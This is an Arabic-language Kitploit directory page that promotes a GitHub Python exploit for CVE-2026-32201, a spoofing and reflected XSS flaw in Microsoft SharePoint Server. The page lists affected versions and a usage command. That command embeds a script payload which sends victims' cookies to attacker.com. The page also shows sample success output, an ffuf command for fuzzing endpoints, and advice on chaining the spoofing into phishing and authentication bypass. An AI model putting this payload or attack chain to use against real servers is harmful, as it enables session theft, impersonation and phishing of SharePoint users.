Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-32201-exploit — استغلال بلغة Python لثغرة CVE-2026-32201، وهي ثغرة XSS منعكسة في Microsoft SharePoint Server، تتيح انتحال الهوية وتعديل البيانات دون مصادقة عبر طلبات HTTP مصممة بعناية. | Kitploit
أدوات/GitHubGitHub/b1tbit/cve-2026-32201-exploit
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

استغلال بلغة Python لثغرة CVE-2026-32201، وهي ثغرة XSS منعكسة في Microsoft SharePoint Server، تتيح انتحال الهوية وتعديل البيانات دون مصادقة عبر طلبات HTTP مصممة بعناية.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظرة عامة

استغلال بايثون لـ CVE-2026-32201 - التحقق غير السليم من الإدخال في Microsoft SharePoint Server، مما يسمح بانتحال الشبكة دون مصادقة (C:L/I:L).

  • المتأثر: SharePoint Server 2016 Enterprise، 2019، Subscription Edition < 16.0.19725.20210؛
  • المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N؛
  • التأثير: عرض/تغيير البيانات الحساسة عبر إشعارات/مستندات منتحلة.

الميزات

  1. بصمة SharePoint.
  2. طلب POST مُصمَّم لتجاوز التحقق من الإدخال (sender_override).
  3. حمولة قابلة للتخصيص (المرسل، المستلم، الموضوع، الرسالة مع XSS).
  4. تحليل الاستجابة للتحقق.

الاستخدام

  1. احفظه كـ exploit.py
  2. شغّله لإنشاء ملف نموذج خبيث:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

مثال على المخرجات:

root@kitploit:~
[+] تم اكتشاف SharePoint.
[*] إرسال طلب منتحل إلى https://target.com/_layouts/15/notify.aspx
[+] الحالة: 200
[+] نجاح محتمل: تحقق من سجلات/بريد الهدف بحثًا عن محتوى منتحل.

التخصيص

  • فحص نقاط النهاية: ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • حمولة XSS: أضف JavaScript في --message لسرقة ملفات تعريف الارتباط
  • التسلسل: انتحال ← رابط تصيد ← تجاوز المصادقة

التحقق

  • مؤشرات النجاح: 200 OK + "sent/success" في الاستجابة
  • جانب الخادم: تحقق من سجلات ULS/سجلات IIS بحثًا عن طلبات شاذة
  • التأثير: راقب البريد الإلكتروني/المستندات بحثًا عن مرسل مزور، واختبر تعديل البيانات
تنزيل الأداة